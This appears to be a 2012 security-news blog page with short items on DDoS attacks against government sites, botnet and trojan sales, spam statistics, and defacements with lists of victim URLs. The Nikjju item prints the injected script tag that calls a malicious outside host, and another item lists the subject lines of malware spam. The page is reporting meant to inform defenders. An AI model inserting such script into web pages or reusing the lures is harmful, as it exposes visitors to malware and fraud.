Search This Blog

Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

CIA site take down by UGNazi Hackers group

Hackers part of UGNazi group launched DDOS attack against CIA.gov site , results in both websites are inaccessible now.

Initially ,some anonymous member take credit for the Cyber attack by tweeting "CIA Tango Down", but later it admitted UGNazi had instead brought down the site.

"since #anonymous tryed to take credit for tango down'in http://cia.gov , we have stopped attack and oh look now its up! #UGNazi" UGNazi group tweet says.

Hackers again attacked the and bring down the site.  At the time writing, both cia.gov is inaccessible.

@ThaCosmo, the member of UGNazi said the group has also compromised a notice sent out by the FBI Assistant Director in Charge Janice K. Fedarcyk to Field Offices.  They leaked the details in pastebin.

"all will be well aware of the brutality in individual privacy that will come after CISPA is implemented by the Government. And this is the exact reason for all these online protests that are on large today. We are fighting for the common people and to protect their privacy, to protect them from the prying eyes of the corrupt government." Hacker said.

CyberCriminals selling SpyEye botnet for lowest price ($150)

[Security Risk] CyberCriminals selling the SpyEye botnet for lowest price, just $150 , making them highly accessible to anyone. Soon, lot of peoples will be targeted with an increasing amount of infection attempts.

Recently, McAfee researchers found a pastebin paste that advertised a SpyEye Version 1.3.48-with the newest software, injection types and plugins. Also it offers three months free web hosting.

"SpyEye has definitely been buzzing on the Internet for the last few years and remains the top (in stealing money) banking botnet." Researcher said in the blog post ." Bad guys or script kiddies are willing to pay a lot of money for this popular botnet. With people selling this botnet for such low prices and with the availability of leaked code, we may see a rise in this botnet’s activities and control servers. "

India , The world's largest source of spammers

This morning the latest publication of 'Dirty Dozen's Report ' was announced , detailing the world's top spam carring countries. As descpibed by the Security and Data Protection providers Sophos.


In this quarter 1, report for 2012, India appears to have overwhelm United States in World's top contributor of spam messages till now. India’s rise was highlighted because of the growing Internet using population.


The top twelve spam relaying countries for January - March 2012

1. India 9.3%
2. USA 8.3%
3. S Korea 5.7%
4. Indonesia 5.0%
5. Russia 5.0%
6. Italy 4.9%
7. Brazil 4.3%
8. Poland 3.9%
9. Pakistan 3.3%
10. Vietnam 3.2%
11. Taiwan 2.9%
12. Peru 2.5%
13.Other 41.7%


The study revels that the overall amount of spam had decreased globally due to the efforts taken by Internet Service Provider (ISP) against  spam messages.

According to Sophos, there’s a one in ten chance that spam was relayed from an Indian computer.

Not necessary the cybercriminals who launch spam campaigns reside in these countries. After all, the majority of spam comes from computers that are exposed by malicious hackers and are used as 'spam-sending zombies'.

Spammers are increasingly finding new ways to spread junk messages by using social networking sites like Facebook,Twitter.

Also, the amount of messages that spread malware or represent more targeted attempts to ‘phish’ usernames, passwords and personal information, is increasing.

So, users are advised to defend your computer from these spams with up-to-date anti-virus software and use appropriate measures to block these kind of spams from comming towards you.

3 Philippines Presidency sites back to online after ddos attack

A few days after they hacked the University of Philippines website, Chinese hackers hacked the 3 more Philippines websites(Presidency Sites).

On April 23 2012, Hackers take down the the Official Gazette website (www.gov.ph), the PCDSPO website (www.pcdspo.gov.ph), and the Presidential Museum and Library website (www.malacanang.gov.ph) with distributed-denial-of-service(DDOS) attack.

"We determined that this was a denial-of-service attack. Information gathered through our data analysis indicated that the attack originated from IP addresses assigned to Chinese networks."presidential Spokesperson Edwin Lacierda said.

"The PCDSPO is endeavoring to maintain its websites. However, please note that we can expect temporary disruption of service while the attack is ongoing." he added.

At the time of writing this article, the websites are back to online.

10 websites hacked by Nyro Hacker

Nyro Hacker hacked  and defaced around 10 websites .

Hacked Sites
http://www.lmdmco.com/
http://ainleyprojects.com.au/
http://www.bornagainelvis.com/
http://www.dchealth.com.au
http://www.elitescapes.com.au
http://www.allaboutepidural.com
http://gpkelly.com
http://iop.net.au/
http://www.silveredcopy.com/
http://thenovakagency.com.au/

Mirror:http://www.zone-hack.com/defacements/?id=26488
www.zone-hack.com/defacements/?id=26487
http://www.zone-hack.com/defacements/?id=26486
http://www.zone-hack.com/defacements/?id=26485
http://www.zone-hack.com/defacements/?id=26484
http://www.zone-hack.com/defacements/?id=26483
http://www.zone-hack.com/defacements/?id=26482
http://www.zone-hack.com/defacements/?id=26481

"Why did you put this photo online? Naked?" spam mail leads to malware


What will you do if you get a mail with subject "Check the attachment you have to react somehow to this picture" ? Will you download the attachment and see what is inside? or just ignore ? If your answer is second one, then you don't need to read this news.  But if you are curious to download the attachment to see what is inside , then you must read this.

Sophos security researchers intercepted a mail that pretending to be an email about a revealing photo posted online of the recipient. The mail has an attached Zip file which contains a Trojan Horse.

The email subject may vary , here some subjects intercepted by researhcers:
  • RE:Check the attachment you have to react somehow to this picture
  • FW:Check the attachment you have to react somehow to this picture
  • RE:You HAVE to check this photo in attachment man
  • RE:They killed your privacy man your photo is all over facebook! NAKED!
  • RE:Why did you put this photo online?
Sophos Security solutions detect the malware as Troj/Bredo-VV and Mal/BredoZp-B.

#OpBahrain: Anonymous hacked formula 1 website

The hacker collective, Anonymous take down the formula 1 website via distributed-denial-of-service(DDoS) attack to protest Bahrain Race.

Hackers also defaced f1-racers.net website and published a statement about the formula 1 attack.

"Not only is the Human Rights situation in Bahrain tragic, it becomes more drastic with each passing day. For these reasons the F1 Grand Prix in Bahrain should be strongly opposed. The Al Khalifa regime stands to profit heavily off the race and has promised to use live ammunition against protestors in preparation,” the hackers said.

Remote Access Trojan steals credit card data from a hotel PoS app


Cyber Criminals are selling a remote access Trojan on underground forums that targets hotel front desk computers , capable of stealing credit card details.

According to Trusteer researchers report, the Trojan steals credit card and other customer information by capturing screenshots from the PoS application.

"This scheme, which is focused on the hospitality industry, illustrates how criminals are planting malware on enterprise machines to collect financial information instead of targeting end users devices."Trusteer researcher said.

The Trojan is being offered for $280, the purchase price includes instructions on how to set-up the Trojan. The seller even offer advice on how to use vishing(phishing attack via VoIP) technique to trick front desk managers into installing the Trojan.



To prove the effectiveness of the fraud package, the seller uses a screenshot taken by the remote access Trojan from the PoS system at one of the world’s largest hotel chains.


Anonymous hackers launches AnonPaste , an alternative to Pastebin


Hackers often like to dump the compromised data in pastebin but pastebin didn’t take too kindly to its service being used that way, and pledged to delete posts which it considered to be abusing the service. Also, allegedly pastebin gave the IP addresses of hackers to the authorities.

In order to overcome this problem , Anonymous launched their own service.

In a press release issued Tuesday, Anonymous and a group calling itself the People's Liberation Front announced about the new site called AnonPaste(www.AnonPaste.tk), claims it will allow users to post sensitive material without fear of being tracked down.

Hackers claimed the new service will be free from logs, censorship and advertisements. All pastes are encrypted by the browser using 256 bit AES encryption.

"We feel that it is essential that everyone, and especially those in the movement - have a safe and secure paste service that they can trust with their valuable and often politically sensitive material. As always, we believe in the radical notion that information should be free." Hackers said in the press release.

Hackers take down the Government of the District of Columbia

Hackers, part of the UGNazi collective, take down The official web site of the Government of the District of Columbia.  Yesterday, they take down the New York City(nyc.gov) site for nearly one hour.

According to Softpedia report, the dc.gov and nyc.gov, have been down for several hours.

“The capital of US is in DC. Seems the government doesn't care about what we think about. The best place to hit them is at there heart,” Softpedia quoted the hacker as saying.

“We will also be launching more attacks on other government websites,” Cosmo added.

Nikjju Mass injection : 180k+ pages compromised via SQL injection


Hackers compromised more than 180,000 webpages and inject malicious script by exploiting the SQL Injection vulnerability.  The nikjju Mass SQL Injection campaign targets ASP websites.

The compromised websites are injected with following script:
    <script src= http://nikjju.com/r.php ></script>

The injected script will redirect visitors to Fake/Rogue AVs (best-antiviruu.de.lv – mostly targeting Windows users).

According to Sucuri report, Google results 188,000 pages infected with that javascript call, but the number is growing really fast.

The domain Nikjju.com (31.210.100.242) was registered April 1st and the hack was started few days after(April 4th).

Few Chinese government websites are fall for this attack:

  • jnd.xmchengdu.gov.cn
  • study.dyny.gov.cn
  • www.cnll.gov.cn
  • www.bj.hzjcy.gov.cn
  • www.mirpurkhas.gov.pk
  • www.tdnyw.gov.cn
  • gcjs.kaifeng.gov.cn


If your suspect your site has been compromised, you can verify it on Sucuri SiteCheck (free scanner):
http://sitecheck.sucuri.net/scanner/